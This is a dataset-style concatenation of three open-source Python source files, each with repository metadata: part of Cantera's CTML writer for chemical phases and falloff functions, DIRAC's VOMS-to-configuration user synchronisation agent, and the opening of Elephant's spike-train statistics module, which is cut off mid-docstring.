t = ph.addChild('transport')
t['model'] = self._tr
if self._kin:
k = ph.addChild("kinetics")
k['model'] = self._kin
class redlich_kwong(phase):
"""A fluid with a complete liquid/vapor equation of state.
This entry type selects one of a set of predefined fluids with
built-in liquid/vapor equations of state. The substance_flag
parameter selects the fluid. See purefluids.py for the usage
of this entry type."""
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
substance_flag = 7,
initial_state = None,
Tcrit = 1.0,
Pcrit = 1.0,
options = []):
phase.__init__(self, name, 3, elements, species, note, 'none',
initial_state, options)
self._subflag = substance_flag
self._pure = 1
self._tc = Tcrit
self._pc = Pcrit
def conc_dim(self):
return (0,0)
def build(self, p):
ph = phase.build(self, p)
e = ph.child("thermo")
e['model'] = 'PureFluid'
e['fluid_type'] = repr(self._subflag)
addFloat(e, 'Tc', self._tc, defunits = "K")
addFloat(e, 'Pc', self._pc, defunits = "Pa")
addFloat(e, 'MolWt', self._mw, defunits = _umass+"/"+_umol)
ph.addChild("kinetics")
k['model'] = 'none'
class ideal_interface(phase):
"""A chemically-reacting ideal surface solution of multiple species."""
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
reactions = 'none',
site_density = 0.0,
phases = [],
kinetics = 'Interface',
transport = 'None',
initial_state = None,
options = []):
"""
The parameters correspond to those of :class:`.phase`, with the
following modifications:
:param reactions:
The heterogeneous reactions at this interface. If omitted, no
reactions will be included. A string or sequence of strings in the
format described in :ref:`sec-declaring-reactions`.
:param site_density:
The number of adsorption sites per unit area.
:param phases:
A string listing the bulk phases that participate in reactions
at this interface.
"""
self._type = 'surface'
phase.__init__(self, name, 2, elements, species, note, reactions,
initial_state, options)
self._pure = 0
self._kin = kinetics
self._tr = transport
self._phases = phases
self._sitedens = site_density
def build(self, p):
ph = phase.build(self, p)
e = ph.child("thermo")
e['model'] = 'Surface'
addFloat(e, 'site_density', self._sitedens, defunits = _umol+'/'+_ulen+'2')
k = ph.addChild("kinetics")
k['model'] = self._kin
t = ph.addChild('transport')
t['model'] = self._tr
p = ph.addChild('phaseArray',self._phases)
def conc_dim(self):
return (1, -2)
class edge(phase):
"""A 1D boundary between two surface phases."""
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
reactions = 'none',
site_density = 0.0,
phases = [],
kinetics = 'Edge',
transport = 'None',
initial_state = None,
options = []):
self._type = 'edge'
phase.__init__(self, name, 1, elements, species, note, reactions,
initial_state, options)
self._pure = 0
self._kin = kinetics
self._tr = transport
self._phases = phases
self._sitedens = site_density
def build(self, p):
ph = phase.build(self, p)
e = ph.child("thermo")
e['model'] = 'Edge'
addFloat(e, 'site_density', self._sitedens, defunits = _umol+'/'+_ulen)
k = ph.addChild("kinetics")
k['model'] = self._kin
t = ph.addChild('transport')
t['model'] = self._tr
p = ph.addChild('phaseArray',self._phases)
def conc_dim(self):
return (1, -1)
## class binary_salt_parameters:
## def __init__(self,
## cation = "",
## anion = "",
## beta0 = None,
## beta1 = None,
## beta2 = None,
## Cphi = None,
## Alpha1 = -1.0):
## self._cation = cation
## self._anion = anion
## self._beta0 = beta0
## self._beta1 = beta1
## self._Cphi = Cphi
## self._Alpha1 = Alpha1
## def build(self, a):
## s = a.addChild("binarySaltParameters")
## s["cation"] = self._cation
## s["anion"] = self._anion
## s.addChild("beta0", self._beta0)
## s.addChild("beta1", self._beta1)
## s.addChild("beta2", self._beta2)
## s.addChild("Cphi", self._Cphi)
## s.addChild("Alpha1", self._Alpha1)
## class theta_anion:
## def __init__(self,
## anions = None,
## theta = 0.0):
## self._anions = anions
## self._theta = theta
## def build(self, a):
## s = a.addChild("thetaAnion")
## s["anion1"] = self._anions[0]
## s["anion2"] = self._anions[1]
## s.addChild("Theta", self._theta)
## class psi_common_cation:
## def __init__(self,
## anions = None,
## cation = '',
## theta = 0.0,
## psi = 0.0):
## self._anions = anions
## self._cation = cation
## self._theta = theta
## self._psi = psi
## def build(self, a):
## s = a.addChild("psiCommonCation")
## s["anion1"] = self._anions[0]
## s["anion2"] = self._anions[1]
## s["cation"] = self._cation
## s.addChild("Theta", self._theta)
## s.addChild("Psi", self._psi)
## class psi_common_anion:
## def __init__(self,
## anion = '',
## cations = None,
## theta = 0.0,
## psi = 0.0):
## self._anion = anion
## self._cations = cations
## self._theta = theta
## self._psi = psi
## def build(self, a):
## s = a.addChild("psiCommonAnion")
## s["anion1"] = self._cations[0]
## s["anion2"] = self._cations[1]
## s["cation"] = self._anion
## s.addChild("Theta", self._theta)
## s.addChild("Psi", self._psi)
## class theta_cation:
## def __init__(self,
## cations = None,
## theta = 0.0):
## self._cations = cations
## self._theta = theta
## def build(self, a):
## s = a.addChild("thetaCation")
## s["cation1"] = self._anions[0]
## s["cation2"] = self._anions[1]
## s.addChild("Theta", self._theta)
## class pitzer:
## def __init__(self,
## temp_model = "",
## A_Debye = "",
## default_ionic_radius = -1.0,
## class electrolyte(phase):
## """An electrolye solution obeying the HMW model."""
## def __init__(self,
## name = '',
## elements = '',
## species = '',
## note = '',
## transport = 'None',
## initial_state = None,
## solvent = '',
## standard_concentration = '',
## activity_coefficients = None,
## options = []):
## phase.__init__(self, name, 3, elements, species, note, 'none',
## initial_state, options)
## self._pure = 0
## self._solvent = solvent
## self._stdconc = standard_concentration
## def conc_dim(self):
## return (1,-3)
## def build(self, p):
## ph = phase.build(self, p)
## e = ph.child("thermo")
## sc = e.addChild("standardConc")
## sc['model'] = self._stdconc
## e['model'] = 'HMW'
## e.addChild("activity_coefficients")
## addFloat(e, 'density', self._dens, defunits = _umass+'/'+_ulen+'3')
## if self._tr:
## t = ph.addChild('transport')
## t['model'] = self._tr
## k = ph.addChild("kinetics")
## k['model'] = 'none'
#-------------------------------------------------------------------
# falloff parameterizations
class Troe(object):
"""The Troe falloff function."""
def __init__(self, A = 0.0, T3 = 0.0, T1 = 0.0, T2 = -999.9):
"""
Parameters: *A*, *T3*, *T1*, *T2*. These must be entered as pure
numbers with no attached dimensions.
"""
if T2 != -999.9:
self._c = (A, T3, T1, T2)
else:
self._c = (A, T3, T1)
def build(self, p):
s = ''
for num in self._c:
s += '%g ' % num
f = p.addChild('falloff', s)
f['type'] = 'Troe'
class SRI(object):
""" The SRI falloff function."""
def __init__(self, A = 0.0, B = 0.0, C = 0.0, D = -999.9, E=-999.9):
"""
Parameters: *A*, *B*, *C*, *D*, *E*. These must be entered as
pure numbers without attached dimensions.
"""
if D != -999.9 and E != -999.9:
self._c = (A, B, C, D, E)
else:
self._c = (A, B, C)
def build(self, p):
s = ''
for num in self._c:
s += '%g ' % num
f = p.addChild('falloff', s)
f['type'] = 'SRI'
class Lindemann(object):
"""The Lindemann falloff function."""
def __init__(self):
""" This falloff function takes no parameters."""
pass
def build(self, p):
f = p.addChild('falloff')
f['type'] = 'Lindemann'
#get_atomic_wts()
validate()
def convert(filename=None, outName=None, text=None):
import os
if filename is not None:
filename = os.path.expanduser(filename)
base = os.path.basename(filename)
root, _ = os.path.splitext(base)
dataset(root)
elif outName is None:
outName = 'STDOUT'
try:
if filename is not None:
with open(filename, 'rU') as f:
code = compile(f.read(), filename, 'exec')
else:
code = compile(text, '<string>', 'exec')
exec(code)
except SyntaxError as err:
# Show more context than the default SyntaxError message
# to help see problems in multi-line statements
if filename:
text = open(filename, 'rU').readlines()
else:
text = text.split('\n')
_printerr('%s in "%s" on line %i:\n' % (err.__class__.__name__,
err.filename,
err.lineno))
_printerr('| Line |')
for i in range(max(err.lineno-6, 0),
min(err.lineno+3, len(text))):
_printerr('| % 5i |' % (i+1), text[i].rstrip())
if i == err.lineno-1:
_printerr(' '* (err.offset+9) + '^')
_printerr()
sys.exit(3)
except Exception as err:
import traceback
if filename:
text = open(filename, 'rU').readlines()
else:
text = text.split('\n')
filename = '<string>'
tb = traceback.extract_tb(sys.exc_info()[2])
lineno = tb[-1][1]
if tb[-1][0] == filename:
# Error in input file
_printerr('%s on line %i of %s:' % (err.__class__.__name__, lineno, filename))
_printerr(err)
_printerr('\n| Line |')
for i in range(max(lineno-6, 0),
min(lineno+3, len(text))):
if i == lineno-1:
_printerr('> % 4i >' % (i+1), text[i].rstrip())
else:
_printerr('| % 4i |' % (i+1), text[i].rstrip())
else:
# Error in ctml_writer or elsewhere
traceback.print_exc()
sys.exit(4)
write(outName)
def main():
if len(sys.argv) not in (2,3):
raise ValueError('Incorrect number of command line arguments.')
convert(*sys.argv[1:])
if __name__ == "__main__":
main()
|
imitrichev/cantera
|
interfaces/cython/cantera/ctml_writer.py
|
Python
|
bsd-3-clause
| 87,633
|
[
"CRYSTAL"
] |
f8d5756548ad6fa058070aae1afeb8bd1377de195ca9478e6fedfc845a72477f
|
"""
VOMS2CSAgent performs the following operations:
- Adds new users for the given VO taking into account the VO VOMS information
- Updates the data in the CS for existing users including DIRAC group membership
The following options can be set for the VOMS2CSAgent.
.. literalinclude:: ../ConfigTemplate.cfg
:start-after: ##BEGIN VOMS2CSAgent
:end-before: ##END
:dedent: 2
:caption: VOMS2CSAgent options
"""
from DIRAC import S_OK, gConfig, S_ERROR
from DIRAC.Core.Base.AgentModule import AgentModule
from DIRAC.Core.Utilities.Proxy import executeWithUserProxy
from DIRAC.ConfigurationSystem.Client.Helpers.Registry import getVOOption, getUserOption
from DIRAC.ConfigurationSystem.Client.VOMS2CSSynchronizer import VOMS2CSSynchronizer
from DIRAC.FrameworkSystem.Client.NotificationClient import NotificationClient
from DIRAC.Resources.Catalog.FileCatalog import FileCatalog
__RCSID__ = "$Id$"
class VOMS2CSAgent(AgentModule):
def __init__(self, *args, **kwargs):
""" Defines default parameters
"""
super(VOMS2CSAgent, self).__init__(*args, **kwargs)
self.voList = ['any']
self.dryRun = True
self.autoAddUsers = True
self.autoModifyUsers = True
self.autoDeleteUsers = True
self.detailedReport = True
self.makeFCEntry = False
self.autoLiftSuspendedStatus = True
self.mailFrom = 'noreply@dirac.system'
def initialize(self):
""" Initialize the default parameters
"""
self.dryRun = self.am_getOption('DryRun', self.dryRun)
# # General agent options, can be overridden by VO options
self.autoAddUsers = self.am_getOption('AutoAddUsers', self.autoAddUsers)
self.autoModifyUsers = self.am_getOption('AutoModifyUsers', self.autoModifyUsers)
self.autoDeleteUsers = self.am_getOption('AutoDeleteUsers', self.autoDeleteUsers)
self.autoLiftSuspendedStatus = self.am_getOption('AutoLiftSuspendedStatus', self.autoLiftSuspendedStatus)
self.makeFCEntry = self.am_getOption('MakeHomeDirectory', self.makeFCEntry)
self.detailedReport = self.am_getOption('DetailedReport', self.detailedReport)
self.mailFrom = self.am_getOption('MailFrom', self.mailFrom)
self.voList = self.am_getOption('VO', self.voList)
if not self.voList:
return S_ERROR("Option 'VO' not configured")
if self.voList[0].lower() == "any":
result = gConfig.getSections('/Registry/VO')
if not result['OK']:
return result
self.voList = result['Value']
self.log.notice("VOs", self.voList)
return S_OK()
def execute(self):
for vo in self.voList:
voAdminUser = getVOOption(vo, "VOAdmin")
voAdminMail = None
if voAdminUser:
voAdminMail = getUserOption(voAdminUser, "Email")
voAdminGroup = getVOOption(vo, "VOAdminGroup", getVOOption(vo, "DefaultGroup"))
self.log.info('Performing VOMS sync',
'for VO %s with credentials %s@%s' % (vo, voAdminUser, voAdminGroup))
autoAddUsers = getVOOption(vo, "AutoAddUsers", self.autoAddUsers)
autoModifyUsers = getVOOption(vo, "AutoModifyUsers", self.autoModifyUsers)
autoDeleteUsers = getVOOption(vo, "AutoDeleteUsers", self.autoDeleteUsers)
autoLiftSuspendedStatus = getVOOption(vo, "AutoLiftSuspendedStatus", self.autoLiftSuspendedStatus)
vomsSync = VOMS2CSSynchronizer(vo,
autoAddUsers=autoAddUsers,
autoModifyUsers=autoModifyUsers,
autoDeleteUsers=autoDeleteUsers,
autoLiftSuspendedStatus=autoLiftSuspendedStatus)
result = self.__syncCSWithVOMS(vomsSync, # pylint: disable=unexpected-keyword-arg
proxyUserName=voAdminUser,
proxyUserGroup=voAdminGroup)
if not result['OK']:
self.log.error('Failed to perform VOMS to CS synchronization:', 'VO %s: %s' % (vo, result["Message"]))
continue
resultDict = result['Value']
newUsers = resultDict.get("NewUsers", [])
modUsers = resultDict.get("ModifiedUsers", [])
delUsers = resultDict.get("DeletedUsers", [])
susUsers = resultDict.get("SuspendedUsers", [])
csapi = resultDict.get("CSAPI")
adminMessages = resultDict.get("AdminMessages", {'Errors': [], 'Info': []})
voChanged = resultDict.get("VOChanged", False)
self.log.info("Run user results",
": new %d, modified %d, deleted %d, new/suspended %d" %
(len(newUsers), len(modUsers), len(delUsers), len(susUsers)))
if csapi.csModified:
# We have accumulated all the changes, commit them now
self.log.info("There are changes to the CS ready to be committed", "for VO %s" % vo)
if self.dryRun:
self.log.info("Dry Run: CS won't be updated")
csapi.showDiff()
else:
result = csapi.commitChanges()
if not result['OK']:
self.log.error("Could not commit configuration changes", result['Message'])
return result
self.log.notice("Configuration committed", "for VO %s" % vo)
else:
self.log.info("No changes to the CS recorded at this cycle", "for VO %s" % vo)
# Add user home directory in the file catalog
if self.makeFCEntry and newUsers:
self.log.info("Creating home directories for users", str(newUsers))
result = self.__addHomeDirectory(vo, newUsers, # pylint: disable=unexpected-keyword-arg
proxyUserName=voAdminUser,
proxyUserGroup=voAdminGroup)
if not result['OK']:
self.log.error('Failed to create user home directories:', 'VO %s: %s' % (vo, result["Message"]))
else:
for user in result['Value']['Failed']:
self.log.error("Failed to create home directory", "user: %s, operation: %s" %
(user, result['Value']['Failed'][user]))
adminMessages['Errors'].append("Failed to create home directory for user %s: operation %s" %
(user, result['Value']['Failed'][user]))
for user in result['Value']['Successful']:
adminMessages['Info'].append("Created home directory for user %s" % user)
if voChanged or self.detailedReport:
mailMsg = ""
if adminMessages['Errors']:
mailMsg += "\nErrors list:\n %s" % "\n ".join(adminMessages['Errors'])
if adminMessages['Info']:
mailMsg += "\nRun result:\n %s" % "\n ".join(adminMessages['Info'])
if self.detailedReport:
result = vomsSync.getVOUserReport()
if result['OK']:
mailMsg += '\n\n'
mailMsg += result['Value']
else:
mailMsg += 'Failed to produce a detailed user report'
mailMsg += result['Message']
if self.dryRun:
self.log.info("Dry Run: mail won't be sent")
else:
NotificationClient().sendMail(self.am_getOption('MailTo', voAdminMail),
"VOMS2CSAgent run log", mailMsg,
self.mailFrom)
return S_OK()
@executeWithUserProxy
def __syncCSWithVOMS(self, vomsSync):
return vomsSync.syncCSWithVOMS()
@executeWithUserProxy
def __addHomeDirectory(self, vo, newUsers):
fc = FileCatalog(vo=vo)
defaultVOGroup = getVOOption(vo, "DefaultGroup", "%s_user" % vo)
failed = {}
successful = {}
for user in newUsers:
result = fc.addUser(user)
if not result['OK']:
failed[user] = "addUser"
continue
dirName = '/%s/user/%s/%s' % (vo, user[0], user)
result = fc.createDirectory(dirName)
if not result['OK']:
failed[user] = "createDirectory"
continue
result = fc.changePathOwner({dirName: user}, recursive=False)
if not result['OK']:
failed[user] = "changePathOwner"
continue
result = fc.changePathGroup({dirName: defaultVOGroup}, recursive=False)
if not result['OK']:
failed[user] = "changePathGroup"
continue
successful[user] = True
return S_OK({"Successful": successful, "Failed": failed})
|
andresailer/DIRAC
|
ConfigurationSystem/Agent/VOMS2CSAgent.py
|
Python
|
gpl-3.0
| 8,324
|
[
"DIRAC"
] |
f27578cb9cf028f33baf7da1aaf91861dd5191572c3da905d9cc9846c57c22dc
|
# -*- coding: utf-8 -*-
"""
Statistical measures of spike trains (e.g., Fano factor) and functions to estimate firing rates.
:copyright: Copyright 2014-2016 by the Elephant team, see AUTHORS.txt.
:license: Modified BSD, see LICENSE.txt for details.
"""
from __future__ import division, print_function
import numpy as np
import quantities as pq
import scipy.stats
import scipy.signal
import neo
from neo.core import SpikeTrain
import elephant.conversion as conv
import elephant.kernels as kernels
import warnings
# warnings.simplefilter('always', DeprecationWarning)
def isi(spiketrain, axis=-1):
"""
Return an array containing the inter-spike intervals of the SpikeTrain.
Accepts a Neo SpikeTrain, a Quantity array, or a plain NumPy array.
If either a SpikeTrain or Quantity array is provided, the return value will
be a quantities array, otherwise a plain NumPy array. The units of
the quantities array will be the same as spiketrain.
Parameters
----------
spiketrain : Neo SpikeTrain or Quantity array or NumPy ndarray
The spike times.
axis : int, optional
The axis along which the difference is taken.
Default is the last axis.
Returns
-------
NumPy array or quantities array.
"""
if axis is None:
axis = -1
if isinstance(spiketrain, neo.SpikeTrain):
intervals = np.diff(
np.sort(spiketrain.times.view(pq.Quantity)), axis=axis)
else:
intervals = np.diff(np.sort(spiketrain), axis=axis)
return intervals
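# A short usage sketch, assuming a plain NumPy array of spike times in seconds;
# with a Quantity or SpikeTrain input the result would carry the same units.
# The helper name is hypothetical.
def _example_isi():
    spike_times = np.array([0.1, 0.35, 0.5, 1.2])
    return isi(spike_times)   # -> array of intervals [0.25, 0.15, 0.7]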
def mean_firing_rate(spiketrain, t_start=None, t_stop=None, axis=None):
"""
Return the firing rate of the SpikeTrain.
Accepts a Neo SpikeTrain, a Quantity array, or a plain NumPy array.
If either a SpikeTrain or Quantity array is provided, the return value will
be a quantities array, otherwise a plain NumPy array. The units of
the quantities array will be the inverse of the spiketrain.
The interval over which the firing rate is calculated can be optionally
controlled with `t_start` and `t_stop`
Parameters
----------
spiketrain : Neo SpikeTrain or Quantity array or NumPy ndarray
The spike times.
t_start : float or Quantity scalar, optional
The start time to use for the interval.
If not specified, retrieved from the `t_start`
attribute of `spiketrain`. If that is not present, defaults to
`0`. Any value from `spiketrain` below this value is ignored.
t_stop : float or Quantity scalar, optional
The stop time to use for the time points.
If not specified, retrieved from the `t_stop`
attribute of `spiketrain`. If that is not present, defaults to
the maximum value of `spiketrain`. Any value from
`spiketrain` above this value is ignored.
axis : int, optional
The axis over which to do the calculation.
Default is `None`, do the calculation over the flattened array.
Returns
-------
float, quantities scalar, NumPy array or quantities array.
Notes
-----
If `spiketrain` is a Quantity or Neo SpikeTrain and `t_start` or `t_stop`
are not, `t_start` and `t_stop` are assumed to have the same units as
`spiketrain`.
Raises
------
TypeError
If `spiketrain` is a NumPy array and `t_start` or `t_stop`
is a quantity scalar.
"""
if t_start is None:
t_start = getattr(spiketrain, 't_start', 0)
found_t_start = False
if t_stop is None:
if hasattr(spiketrain, 't_stop'):
t_stop = spiketrain.t_stop
else:
t_stop = np.max(spiketrain, axis=axis)
found_t_start = True
# figure out what units, if any, we are dealing with
if hasattr(spiketrain, 'units'):
units = spiketrain.units
else:
units = None
# convert everything to the same units
if hasattr(t_start, 'units'):
if units is None:
raise TypeError('t_start cannot be a Quantity if '
'spiketrain is not a quantity')
t_start = t_start.rescale(units)
elif units is not None:
t_start = pq.Quantity(t_start, units=units)
if hasattr(t_stop, 'units'):
if units is None:
raise TypeError('t_stop cannot be a Quantity if '
'spiketrain is not a quantity')
t_stop = t_stop.rescale(units)
elif units is not None:
t_stop = pq.Quantity(t_stop, units=units)
if not axis or not found_t_start:
return np.sum((spiketrain >= t_start) & (spiketrain <= t_stop),
axis=axis) / (t_stop - t_start)
else:
# this is needed to handle broadcasting between spiketrain and t_stop
t_stop_test = np.expand_dims(t_stop, axis)
return np.sum((spiketrain >= t_start) & (spiketrain <= t_stop_test),
axis=axis) / (t_stop - t_start)
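# --- Hedged usage sketch (illustrative only; not part of the original module).
# Three hypothetical spikes in a 2 s window give a mean rate of 1.5 (1/s).
def _example_mean_firing_rate_usage():
    st = SpikeTrain([0.1, 0.5, 1.2] * pq.s, t_start=0.0 * pq.s, t_stop=2.0 * pq.s)
    # t_start/t_stop are taken from the SpikeTrain: 3 spikes / 2 s = 1.5 * (1/s)
    return mean_firing_rate(st)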
# we make `cv` an alias for scipy.stats.variation for the convenience
# of former NeuroTools users
cv = scipy.stats.variation
def fanofactor(spiketrains):
"""
Evaluates the empirical Fano factor F of the spike counts of
a list of `neo.core.SpikeTrain` objects.
Given the vector v containing the observed spike counts (one per
spike train) in the time window [t0, t1], F is defined as:
F := var(v)/mean(v).
The Fano factor is typically computed for spike trains representing the
activity of the same neuron over different trials. The higher F, the larger
the cross-trial non-stationarity. In theory for a time-stationary Poisson
process, F=1.
Parameters
----------
spiketrains : list of neo.SpikeTrain objects, quantity arrays, numpy arrays or lists
Spike trains for which to compute the Fano factor of spike counts.
Returns
-------
fano : float or nan
The Fano factor of the spike counts of the input spike trains. If an
empty list is specified, or if all spike trains are empty, F:=nan.
"""
# Build array of spike counts (one per spike train)
spike_counts = np.array([len(t) for t in spiketrains])
# Compute FF
if all([count == 0 for count in spike_counts]):
fano = np.nan
else:
fano = spike_counts.var() / spike_counts.mean()
return fano
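# --- Hedged usage sketch (illustrative only; not part of the original module).
# Two hypothetical trials with 3 and 5 spikes: var([3, 5]) / mean([3, 5]) = 1 / 4.
def _example_fanofactor_usage():
    trials = [SpikeTrain([0.1, 0.5, 1.2] * pq.s, t_stop=2.0 * pq.s),
              SpikeTrain([0.2, 0.4, 0.9, 1.1, 1.8] * pq.s, t_stop=2.0 * pq.s)]
    return fanofactor(trials)  # population variance 1.0 / mean 4.0 = 0.25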
def lv(v):
"""
Calculate the measure of local variation LV for
a sequence of time intervals between events.
Given a vector v containing a sequence of intervals, the LV is
defined as:
    .. math::
        LV := \\frac{1}{N} \\sum_{i=1}^{N-1}
              \\frac{3 (isi_i - isi_{i+1})^2}
                    {(isi_i + isi_{i+1})^2}
The LV is typically computed as a substitute for the classical
coefficient of variation for sequences of events which include
some (relatively slow) rate fluctuation. As with the CV, LV=1 for
a sequence of intervals generated by a Poisson process.
Parameters
----------
v : quantity array, numpy array or list
Vector of consecutive time intervals
Returns
-------
lvar : float
The LV of the inter-spike interval of the input sequence.
Raises
------
AttributeError :
If an empty list is specified, or if the sequence has less
than two entries, an AttributeError will be raised.
ValueError :
Only vector inputs are supported. If a matrix is passed to the
function a ValueError will be raised.
References
----------
..[1] Shinomoto, S., Shima, K., & Tanji, J. (2003). Differences in spiking
patterns among cortical neurons. Neural Computation, 15, 2823–2842.
"""
    # convert the input sequence to a numpy array
    v = np.asarray(v)
    # only one-dimensional inputs are supported (cf. the ValueError in the docstring)
    if v.ndim > 1:
        raise ValueError("Only one-dimensional vector inputs are supported. "
                         "Please provide a vector of intervals.")
    # ensure we have enough entries
    if v.size < 2:
        raise AttributeError("Input size is too small. Please provide "
                             "an input with more than 1 entry.")
    # calculate LV and return result
    return 3. * np.mean(np.power(np.diff(v) / (v[:-1] + v[1:]), 2))
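# --- Hedged usage sketch (illustrative only; not part of the original module).
# For perfectly regular intervals every summand is zero, so LV == 0.
def _example_lv_usage():
    return lv([0.1, 0.1, 0.1, 0.1])  # identical ISIs -> 0.0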
# sigma2kw and kw2sigma only needed for oldfct_instantaneous_rate!
# to finally be taken out of Elephant
def sigma2kw(form):
warnings.simplefilter('always', DeprecationWarning)
warnings.warn("deprecated", DeprecationWarning, stacklevel=2)
if form.upper() == 'BOX':
coeff = 2.0 * np.sqrt(3)
elif form.upper() == 'TRI':
coeff = 2.0 * np.sqrt(6)
elif form.upper() == 'EPA':
coeff = 2.0 * np.sqrt(5)
elif form.upper() == 'GAU':
coeff = 2.0 * 2.7 # > 99% of distribution weight
elif form.upper() == 'ALP':
coeff = 5.0
elif form.upper() == 'EXP':
coeff = 5.0
return coeff
def kw2sigma(form):
warnings.simplefilter('always', DeprecationWarning)
warnings.warn("deprecated", DeprecationWarning, stacklevel=2)
return 1/sigma2kw(form)
# to finally be taken out of Elephant
def make_kernel(form, sigma, sampling_period, direction=1):
"""
Creates kernel functions for convolution.
Constructs a numeric linear convolution kernel of basic shape to be used
for data smoothing (linear low pass filtering) and firing rate estimation
from single trial or trial-averaged spike trains.
    Exponential and alpha kernels may also be used to represent postsynaptic
currents / potentials in a linear (current-based) model.
Parameters
----------
form : {'BOX', 'TRI', 'GAU', 'EPA', 'EXP', 'ALP'}
Kernel form. Currently implemented forms are BOX (boxcar),
TRI (triangle), GAU (gaussian), EPA (epanechnikov), EXP (exponential),
ALP (alpha function). EXP and ALP are asymmetric kernel forms and
assume optional parameter `direction`.
sigma : Quantity
Standard deviation of the distribution associated with kernel shape.
This parameter defines the time resolution of the kernel estimate
and makes different kernels comparable (cf. [1] for symmetric kernels).
This is used here as an alternative definition to the cut-off
frequency of the associated linear filter.
sampling_period : float
Temporal resolution of input and output.
direction : {-1, 1}
Asymmetric kernels have two possible directions.
The values are -1 or 1, default is 1. The
definition here is that for direction = 1 the
kernel represents the impulse response function
of the linear filter. Default value is 1.
Returns
-------
kernel : numpy.ndarray
Array of kernel. The length of this array is always an odd
number to represent symmetric kernels such that the center bin
coincides with the median of the numeric array, i.e for a
triangle, the maximum will be at the center bin with equal
number of bins to the right and to the left.
norm : float
For rate estimates. The kernel vector is normalized such that
the sum of all entries equals unity sum(kernel)=1. When
estimating rate functions from discrete spike data (0/1) the
additional parameter `norm` allows for the normalization to
rate in spikes per second.
For example:
``rate = norm * scipy.signal.lfilter(kernel, 1, spike_data)``
m_idx : int
Index of the numerically determined median (center of gravity)
of the kernel function.
Examples
--------
    To obtain the single-trial rate function of a trial one should use::
r = norm * scipy.signal.fftconvolve(sua, kernel)
    To obtain the trial-averaged spike train one should use::
r_avg = norm * scipy.signal.fftconvolve(sua, np.mean(X,1))
where `X` is an array of shape `(l,n)`, `n` is the number of trials and
`l` is the length of each trial.
See also
--------
elephant.statistics.instantaneous_rate
References
----------
.. [1] Meier R, Egert U, Aertsen A, Nawrot MP, "FIND - a unified framework
for neural data analysis"; Neural Netw. 2008 Oct; 21(8):1085-93.
.. [2] Nawrot M, Aertsen A, Rotter S, "Single-trial estimation of neuronal
firing rates - from single neuron spike trains to population activity";
J. Neurosci Meth 94: 81-92; 1999.
"""
warnings.simplefilter('always', DeprecationWarning)
warnings.warn("deprecated", DeprecationWarning, stacklevel=2)
forms_abbreviated = np.array(['BOX', 'TRI', 'GAU', 'EPA', 'EXP', 'ALP'])
forms_verbose = np.array(['boxcar', 'triangle', 'gaussian', 'epanechnikov',
'exponential', 'alpha'])
if form in forms_verbose:
form = forms_abbreviated[forms_verbose == form][0]
assert form.upper() in ('BOX', 'TRI', 'GAU', 'EPA', 'EXP', 'ALP'), \
"form must be one of either 'BOX','TRI','GAU','EPA','EXP' or 'ALP'!"
assert direction in (1, -1), "direction must be either 1 or -1"
# conversion to SI units (s)
if sigma < 0:
raise ValueError('sigma must be positive!')
SI_sigma = sigma.rescale('s').magnitude
SI_time_stamp_resolution = sampling_period.rescale('s').magnitude
norm = 1. / SI_time_stamp_resolution
if form.upper() == 'BOX':
w = 2.0 * SI_sigma * np.sqrt(3)
# always odd number of bins
width = 2 * np.floor(w / 2.0 / SI_time_stamp_resolution) + 1
height = 1. / width
kernel = np.ones((1, width)) * height # area = 1
elif form.upper() == 'TRI':
w = 2 * SI_sigma * np.sqrt(6)
halfwidth = np.floor(w / 2.0 / SI_time_stamp_resolution)
trileft = np.arange(1, halfwidth + 2)
triright = np.arange(halfwidth, 0, -1) # odd number of bins
triangle = np.append(trileft, triright)
kernel = triangle / triangle.sum() # area = 1
elif form.upper() == 'EPA':
w = 2.0 * SI_sigma * np.sqrt(5)
halfwidth = np.floor(w / 2.0 / SI_time_stamp_resolution)
base = np.arange(-halfwidth, halfwidth + 1)
parabula = base**2
epanech = parabula.max() - parabula # inverse parabula
kernel = epanech / epanech.sum() # area = 1
elif form.upper() == 'GAU':
w = 2.0 * SI_sigma * 2.7 # > 99% of distribution weight
halfwidth = np.floor(w / 2.0 / SI_time_stamp_resolution) # always odd
base = np.arange(-halfwidth, halfwidth + 1) * SI_time_stamp_resolution
g = np.exp(
-(base**2) / 2.0 / SI_sigma**2) / SI_sigma / np.sqrt(2.0 * np.pi)
kernel = g / g.sum() # area = 1
elif form.upper() == 'ALP':
w = 5.0 * SI_sigma
alpha = np.arange(
1, (
2.0 * np.floor(w / SI_time_stamp_resolution / 2.0) + 1) +
1) * SI_time_stamp_resolution
alpha = (2.0 / SI_sigma**2) * alpha * np.exp(
-alpha * np.sqrt(2) / SI_sigma)
kernel = alpha / alpha.sum() # normalization
if direction == -1:
kernel = np.flipud(kernel)
elif form.upper() == 'EXP':
w = 5.0 * SI_sigma
expo = np.arange(
1, (
2.0 * np.floor(w / SI_time_stamp_resolution / 2.0) + 1) +
1) * SI_time_stamp_resolution
expo = np.exp(-expo / SI_sigma)
kernel = expo / expo.sum()
if direction == -1:
kernel = np.flipud(kernel)
kernel = kernel.ravel()
m_idx = np.nonzero(kernel.cumsum() >= 0.5)[0].min()
return kernel, norm, m_idx
# to finally be taken out of Elephant
def oldfct_instantaneous_rate(spiketrain, sampling_period, form,
sigma='auto', t_start=None, t_stop=None,
acausal=True, trim=False):
"""
Estimate instantaneous firing rate by kernel convolution.
Parameters
-----------
spiketrain: 'neo.SpikeTrain'
Neo object that contains spike times, the unit of the time stamps
and t_start and t_stop of the spike train.
sampling_period : Quantity
        Time stamp resolution of the spike times. The same resolution will
be assumed for the kernel
form : {'BOX', 'TRI', 'GAU', 'EPA', 'EXP', 'ALP'}
Kernel form. Currently implemented forms are BOX (boxcar),
TRI (triangle), GAU (gaussian), EPA (epanechnikov), EXP (exponential),
ALP (alpha function). EXP and ALP are asymmetric kernel forms and
assume optional parameter `direction`.
sigma : string or Quantity
Standard deviation of the distribution associated with kernel shape.
This parameter defines the time resolution of the kernel estimate
and makes different kernels comparable (cf. [1] for symmetric kernels).
This is used here as an alternative definition to the cut-off
frequency of the associated linear filter.
Default value is 'auto'. In this case, the optimized kernel width for
the rate estimation is calculated according to [1]. Note that the
automatized calculation of the kernel width ONLY works for gaussian
kernel shapes!
t_start : Quantity (Optional)
start time of the interval used to compute the firing rate, if None
assumed equal to spiketrain.t_start
Default:None
    t_stop : Quantity (Optional)
End time of the interval used to compute the firing rate (included).
If none assumed equal to spiketrain.t_stop
Default:None
acausal : bool
if True, acausal filtering is used, i.e., the gravity center of the
